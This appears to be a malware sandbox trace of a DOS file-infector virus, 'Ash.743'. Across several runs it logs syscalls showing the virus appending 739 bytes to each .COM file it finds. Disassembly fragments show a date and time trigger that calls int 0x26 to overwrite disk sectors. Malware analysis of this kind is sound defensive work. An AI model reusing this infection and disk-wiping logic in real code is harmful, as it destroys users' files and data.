Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.k


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:01.764625248Z 26 PC: f835 | Set disk transfer address
2018-12-17T22:34:01.766278464Z 78 PC: f88b | Find first file
2018-12-17T22:34:01.773719856Z 61 PC: f897 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:34:01.781130283Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.788651494Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.791574354Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.795013107Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.812856035Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.816017128Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.824185193Z 62 PC: f87f | Close file
2018-12-17T22:34:01.834071727Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.837913715Z 61 PC: f897 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:34:01.84548746Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.852839817Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.855618644Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.859866525Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.8695842Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.872222055Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.881346121Z 62 PC: f87f | Close file
2018-12-17T22:34:01.890788365Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.893716328Z 61 PC: f897 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:34:01.901928051Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.909039105Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.910454532Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.913817019Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.92254981Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.924816154Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.933522176Z 62 PC: f87f | Close file
2018-12-17T22:34:01.943620301Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.946542353Z 61 PC: f897 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:34:01.954363678Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.961411763Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.962888345Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.966745292Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.976443627Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.978070613Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.985501556Z 62 PC: f87f | Close file
2018-12-17T22:34:01.994930933Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.998158317Z 61 PC: f897 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:34:02.006577071Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.014476908Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.01620441Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.019269215Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.029532636Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.031513157Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.043152399Z 62 PC: f87f | Close file
2018-12-17T22:34:02.054070409Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.057393136Z 61 PC: f897 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:34:02.065410566Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.074718222Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.076740206Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.080205682Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.090557775Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.093151949Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.100291659Z 62 PC: f87f | Close file
2018-12-17T22:34:02.109738856Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.11414352Z 61 PC: f897 | Open file (Filename = 'PAH.COM')
2018-12-17T22:34:02.121670916Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.127891908Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.130467436Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.133691106Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.1431446Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.144975884Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.152094065Z 62 PC: f87f | Close file
2018-12-17T22:34:02.161177125Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.16506011Z 42 PC: f931 | Get date
0xf931: cmp dl, 4
0xf934: jne 0xf940
0xf936: cmp dh, 7
0xf939: jne 0xf940
0xf93b: xor ax, ax
0xf93d: jmp 0xf95e
0xf93f: nop
0xf940: mov ah, 0x2c
0xf942: int 0x21
0xf944: or cl, cl
0xf946: jne 0xf96b
0xf948: cmp ch, 6
0xf94b: jge 0xf96b
0xf94d: add cl, ch
0xf94f: mov ax, cx
0xf951: cwde
0xf952: add al, dh
0xf954: adc al, dl
0xf956: adc ah, 0
0xf959: or ax, ax
2018-12-17T22:34:02.167551984Z 44 PC: f944 | Get time
0xf944: or cl, cl
0xf946: jne 0xf96b
0xf948: cmp ch, 6
0xf94b: jge 0xf96b
0xf94d: add cl, ch
0xf94f: mov ax, cx
0xf951: cwde
0xf952: add al, dh
0xf954: adc al, dl
0xf956: adc ah, 0
0xf959: or ax, ax
0xf95b: jne 0xf95e
0xf95d: inc ax
0xf95e: mov dx, ax
0xf960: mov cx, 1
0xf963: xor bx, bx
0xf965: mov ah, 0x19
0xf967: int 0x21
0xf969: int 0x26
0xf96b: mov bx, 0x31a
2018-12-17T22:34:02.169956913Z 44 PC: f972 | Get time
0xf972: inc dh
0xf974: cmp dh, byte ptr [0x319]
0xf978: jl 0xf980
0xf97a: sub dh, byte ptr [0x319]
0xf97e: jmp 0xf974
0xf980: mov al, dh
0xf982: mov cl, al
0xf984: cwde
0xf985: shl ax, 1
0xf987: add bx, ax
0xf989: mov si, word ptr [bx]
0xf98b: mov ch, byte ptr [si - 1]
0xf98e: mov dx, si
0xf990: mov ah, 9
0xf992: int 0x21
0xf994: cmp ch, 0
0xf997: jne 0xf99b
0xf999: int 0x20
0xf99b: cmp ch, 1
0xf99e: jne 0xf9a1
2018-12-17T22:34:02.173124568Z 9 PC: f994 | Display string (Could not find end pointer)
2018-12-17T22:34:02.177557415Z 26 PC: f849 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.032693215Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.034538261Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.040947772Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.047218288Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.054245264Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.056329266Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.058999571Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.073242131Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.075412919Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.081952091Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.089947786Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.093466525Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.09980998Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.106349985Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.10838961Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.112820623Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.120909419Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.122499156Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.131104892Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.139275463Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.142211168Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.149740664Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.156415098Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.158184363Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.161986676Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.170165059Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.17187156Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.180208467Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.188242594Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.190846855Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.197835206Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.204220657Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.205750368Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.209503931Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.217493224Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.218937607Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.22679703Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.235056811Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.237677818Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.244929921Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.25181472Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.253254367Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.25715632Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.265308238Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.266615411Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.275483131Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.283724611Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.286619619Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.293955304Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.300819616Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.302444484Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.305407468Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.314619384Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.316026925Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.322489292Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.331219626Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.333960982Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.340498061Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.346943481Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.348147582Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.350255057Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.355388467Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.356598995Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.362907537Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.368582723Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.370322612Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.371934438Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.373872364Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.165868373Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.167727346Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.174178052Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.181136465Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.18868639Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.190384122Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.193546173Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.21045968Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.212207209Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.216445707Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.223345932Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.226889694Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.234784383Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.242483235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.244924886Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.248133557Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.257001373Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.259472959Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.266749161Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.275924235Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.279306423Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.286651318Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.293734673Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.296472496Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.299446635Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.309151415Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.316201026Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.323798309Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.332896233Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.335773542Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.34329107Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.347861099Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.349234941Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.352672011Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.361513843Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.363011164Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.36987067Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.385769662Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.389124505Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.397844279Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.40529895Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.406989614Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.410735611Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.419837206Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.421547665Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.429954639Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.439417728Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.442433608Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.449828475Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.458164603Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.460212507Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.463265519Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.474385658Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.476033797Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.48391385Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.494829314Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.498198739Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.506085702Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.514806978Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.516625889Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.52062724Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.530388688Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.532310709Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.53983654Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.550071568Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.553104682Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.555895077Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.558491803Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.282644796Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.284159931Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.291072561Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.298410069Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.305658905Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.307354345Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.310167501Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.325412823Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.32719149Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.334417686Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.343171383Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.346471709Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.354913021Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.362358872Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.364855011Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.369527602Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.378977487Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.381424186Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.389125418Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.39871967Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.402576198Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.409901663Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.417639667Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.419594834Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.422772004Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.431608177Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.43303352Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.440523052Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.4493148Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.452241474Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.460564727Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.467739823Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.469078182Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.472282138Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.481449651Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.482920518Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.490599668Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.499671558Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.503025122Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.510552567Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.51819731Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.519651606Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.522961658Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.531727761Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.533171371Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.542110528Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.551277598Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.55408365Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.561390236Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.568769041Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.570415216Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.573672374Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.584626373Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.586534023Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.594411697Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.604661598Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.608851116Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.616548311Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.624924442Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.626552135Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.629639961Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.6390933Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.640584348Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.647809366Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.657511357Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.660626809Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.66346431Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.666804844Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.776194576Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.777905523Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.785545686Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.793354507Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.806117245Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.808556142Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.811546493Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.82742833Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.829814765Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.83748372Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.847074604Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.851756847Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.859112204Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.866196813Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.868466611Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.871409704Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.880352144Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.881682675Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.889470206Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.899539529Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.902941319Z 61 PC: 12b07 | Open file (See above)
